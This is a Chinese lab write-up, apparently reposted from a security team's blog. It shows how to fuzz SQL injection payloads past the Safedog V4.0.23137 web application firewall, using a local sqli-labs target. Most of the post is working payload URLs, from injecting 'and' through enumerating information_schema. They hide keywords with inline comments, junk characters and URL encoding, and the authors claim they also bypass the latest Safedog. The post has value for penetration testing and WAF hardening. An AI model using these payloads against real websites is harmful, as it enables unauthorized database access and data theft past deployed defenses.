安全狗V4.0.23137 sql注入fuzz绕过

vlambda
2022-05-13

安全狗V4.0.23137 sql注入fuzz绕过

星期五实验室

阅读须知

星期五实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息造成的直接或间接后果和损失，均由使用者本人负责。

星期五实验室拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经授权，不得用于其他。

环境搭建

server2012+安全狗+sqli-lab+phpstudy2018

测试链接：

http://10.30.3.209/sqli/Less-2/?id=1

测试过程

内联注释绕过and

测试and被拦截

http://10.30.3.209/sqli/Less-2/?id=1%20and%201=1

burp抓包开始fuzz

经过测试，发现有一些payload可以绕过and

回显正常

http://10.30.3.209/sqli/Less-2/?id=1%20 /*!10442and*/ %201=1

回显异常，存在注入点。

http://10.30.3.209/sqli/Less-2/?id=1%20 /*!10442and*/ %201=2

注释绕过order by

直接输入order by被拦截

http://10.30.3.209/sqli/Less-2/?id=1 order by 1

在order by中间设置变量值

填充一些垃圾字符，垃圾字符可以如下选择。为了减少爆破次数，这里长度设置为4-5，payload数量只有9072，设置1-5爆破的payload会更多。

/-@$&*~^`?

经过fuzz发现有很多payload可以绕过

order by fuzz结果如下

查看第三列回显正常

http://10.30.3.209/sqli/Less-2/?id=1 order/*////*/ by 3

查看第四列出现报错

http://10.30.3.209/sqli/Less-2/?id=1 order/*////*/ by 4

注释绕过union select

直接输入union select被拦截

在union select中间设置变量值爆破

设置payload数量值范围为4-5，如果爆破不成功可以选择其它范围，比如4-10。

fuzz发现有一些paylaod可以绕过

fuzz结果如下

随便选择一个payload测试

http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/$---*/select%201,2,3http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/~---*/select%201,2,3http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/~--@*/select%201,2,3

部分payload会出现报错

http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*/`--&*/select%201,2,3

把payload /`--& url编码后放入其中执行正常

http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,3

注释绕过敏感命令

这里以user()为例，执行会被拦截

http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user()

这里其实用上面那个过union select的paylaod就可以了

http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*%2f%60--%26*/()

为了演示还是fuzz一下user()，burp抓包设置变量值

根据需要设置payload的取值范围

返回长度为906的为成功绕过安全狗的payload。

fuzz结果如下

这里例举几个成功绕过的payoad，如果出现报错需要将payload编码，比如/&//需要url编码。

http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/@//*/()http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/$//*/()http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*%2f%26%2f%2f*/()http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,user/*/~//*/()

fuzz绕过information_schema.schemata

查询数据库会被拦截

http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+33333%0ainformation_schema./*!schemata*/

在--+和%0a之间添加垃圾字符干扰

fuzz成功跑出一些payload

fuzz结果如下

以下为一些成功绕过的payload

http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/*-/%0ainformation_schema./*!schemata*/http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/%*-%0ainformation_schema./*!schemata*/http://10.30.3.209/sqli/Less-2/?id=-1%20union%20/*%2f%60--%26*/select%201,2,group_concat(schema_name)%20from%20--+/*/*%0ainformation_schema./*!schemata*/

上面的payload也可以绕过最新的安全狗

简单总结

使用注释可以绕过and，order by，union select，where等关键词

绕过information_schema.schemata需要换行+单行注释

FRIDAY LAB

星期五实验室成立于2017年，汇集众多技术研究人员，在工业互联网安全前瞻技术研究方向上不断进取。星期五实验室由海内外知名高校的学院精英及来自于顶尖企业的行业专家组成，且大部分人员来自国际领先、国内知名的黑客战队——浙大AAA战队。作为木链科技专业的技术研发团队，星期五实验室凭借精湛的专业技术水平，为产品研发提供新思路、为行业技术革新探索新方向。